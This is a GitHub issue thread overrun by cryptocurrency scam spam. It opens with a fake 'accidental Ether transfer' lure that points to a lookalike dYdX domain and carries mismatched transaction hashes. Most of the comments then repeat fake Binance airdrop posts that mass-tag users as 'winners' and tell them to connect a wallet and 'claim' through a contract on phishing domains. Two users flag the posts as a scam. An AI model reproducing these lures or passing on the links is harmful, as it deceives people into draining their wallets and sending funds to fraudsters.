### ISSUE TITLE
Etherscan

### ISSUE THREAD

**Issue by cijagani** [99Kies/2to3#6]
I am reaching out to you with a matter of great urgency regarding a recent Ether transaction to your digital wallet on the Dydx Exchange. Unfortunately, the transaction was completed unintentionally, and upon thorough review, we have identified the error.

### Incident Details:
- **Amount of Ether Sent:** 106.0985922 ETH
- **Transaction ID:** 0x09ca8d072ad024c0d493cb20df1e9ee8858df8aa840fa9780f67fe31721a4dd4
- **Date and Time of Transfer:** November 14, 2023

[![Transfer](https://i.imgur.com/kKpBste.png)](https://etherscan.io/tx/0x09ca8d072ad024c0d493cb20df1e9ee8858df8aa840fa9780f67fed1721a4dd4)

I kindly request you to promptly check your digital wallet on [Dydx Exchange](https://dydxexchang.com) to verify the receipt of the unintended Ether.

To address this matter swiftly, I propose the following resolution: a return of 90 percent of the received amount, with 10 percent retained as compensation.

Your understanding and immediate attention to this matter are highly appreciated. For any questions or additional clarification, please do not hesitate to contact us at [support@cryptomktcopytrading.com](mailto:support@cryptomktcopytrading.com).

**Best regards,**

*John Glenn*

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @hosseinnedaee, @pilagod, @flada-auxv, @RockGui, @Enitsed, @virtualjpeg, @pyraxo, @leviadam, @diwata2021, @fransixles, @junbeomlee, @inqw-qtxr, @ashim-kr-saha, @pkg107, @likegogogo, @ouyun, @1023198294, @musha68k, @zhongyin, @simonbuechi, @0x-stone, @dmokel, @defidiver2, @integrate-your-mind, @AutarkXu, @0xOsiris, @aiden-cao, @SanderSpies, @HardlyDifficult, @cumhury, @fdrio, @tn606024, @swift1911, @hussein-aitlahcen, @andrewpaulicek, @DavidNix, @alexhafner, @beeman, @99Kies, @manboy-eth, @KambizAsadzadeh, @shrynx, @bumi, @gmulhearn, @bleib1dj, @hydratic, @matheusfrancisco, @smuemd, @syndykator19, @LaplaceMan

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @windmgc, @shawnhcd, @inmortalbobz, @dvdknaap, @54huige, @jschoi126, @sh0f, @anwzx, @gema-arta, @iadpay, @xuyi33333, @CatRaiden, @kndrio, @Moe7770, @AdvaithD, @caseyunsolvable32, @Tonland088888, @MCTzOCK, @huangzz, @ahsentekdemir, @Jeremy-DX, @doanchuong, @nslogx, @zhuhj89, @ysyj0531, @imxyb, @Violettte, @wowver, @notha99y, @youerning, @Maxalash, @athulspal, @taishi8117, @darkanglevn, @wukongcheng, @andrewbien, @yzhaoyu, @gozelus, @TimvanScherpenzeel, @alphaventures, @linonetwo, @likegogogo, @sokatkhan1100, @Forstes, @t2hv33, @morganzes, @flexibrah, @zdus4w, @davidalbela, @renlulu

**Comment by dvdknaap** [comment]
> # Binance Airdrop Guide: Claim Your $1500 in BNB Now!
> 
> Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!
> 
> [![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)
> 
> ## Steps to Claim:
> 
> ### 1. Connect Your Binance Wallet:
>    - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
>    - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
> 
> ### 2. Interact with the Contract:
>    - Once your wallet is connected.
>    - Click on the "**Claim**" button to interact with the smart contract.
> 
> Don't miss out on your $1500 in BNB! Act now to secure your tokens.
> 
> 
> Winners: @windmgc, @shawnhcd, @inmortalbobz, @dvdknaap, @54huige, @jschoi126, @sh0f, @anwzx, @gema-arta, @iadpay, @xuyi33333, @CatRaiden, @kndrio, @Moe7770, @AdvaithD, @caseyunsolvable32, @Tonland088888, @MCTzOCK, @huangzz, @ahsentekdemir, @Jeremy-DX, @doanchuong, @nslogx, @zhuhj89, @ysyj0531, @imxyb, @Violettte, @wowver, @notha99y, @youerning, @Maxalash, @athulspal, @taishi8117, @darkanglevn, @wukongcheng, @andrewbien, @yzhaoyu, @gozelus, @TimvanScherpenzeel, @alphaventures, @linonetwo, @likegogogo, @sokatkhan1100, @Forstes, @t2hv33, @morganzes, @flexibrah, @zdus4w, @davidalbela, @renlulu

Above is a scam and reported ⚠️🚨

**Comment by tobarbaro** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by beeman** [comment]
> > # Binance Airdrop Guide: Claim Your $1500 in BNB Now!
> > Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!
> > [![Claim Now](https://camo.githubusercontent.com/8251fc1c02ddbd7f2cc0237f6f10fd031056cd108a8e1670d762a6e77f6aa79b/68747470733a2f2f692e7974696d672e636f6d2f76692f50466847447958737461732f6d617872657364656661756c742e6a7067)](http://go.bnbcoinsearn.online/97Q7Yj)
> > ## Steps to Claim:
> > ### 1. Connect Your Binance Wallet:
> > 
> > * Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
> > * Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
> > 
> > ### 2. Interact with the Contract:
> > 
> > * Once your wallet is connected.
> > * Click on the "**Claim**" button to interact with the smart contract.
> > 
> > Don't miss out on your $1500 in BNB! Act now to secure your tokens.
> > Winners: @windmgc, @shawnhcd, @inmortalbobz, @dvdknaap, @54huige, @jschoi126, @sh0f, @anwzx, @gema-arta, @iadpay, @xuyi33333, @CatRaiden, @kndrio, @Moe7770, @AdvaithD, @caseyunsolvable32, @Tonland088888, @MCTzOCK, @huangzz, @ahsentekdemir, @Jeremy-DX, @doanchuong, @nslogx, @zhuhj89, @ysyj0531, @imxyb, @Violettte, @wowver, @notha99y, @youerning, @Maxalash, @athulspal, @taishi8117, @darkanglevn, @wukongcheng, @andrewbien, @yzhaoyu, @gozelus, @TimvanScherpenzeel, @alphaventures, @linonetwo, @likegogogo, @sokatkhan1100, @Forstes, @t2hv33, @morganzes, @flexibrah, @zdus4w, @davidalbela, @renlulu
> 
> Above is a scam and reported ⚠️🚨

You might want to consider removing your quote as your message is now showing the scam... The other ones are removed.

**Comment by beeman** [comment]
> Above is a scam and reported ⚠️🚨

You might want to consider removing your quote as your message is now showing the scam... The other ones are removed.

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @rmallof, @bahdotsh, @baixuexue123, @frods, @yanis7774, @ACE71313, @andylockran
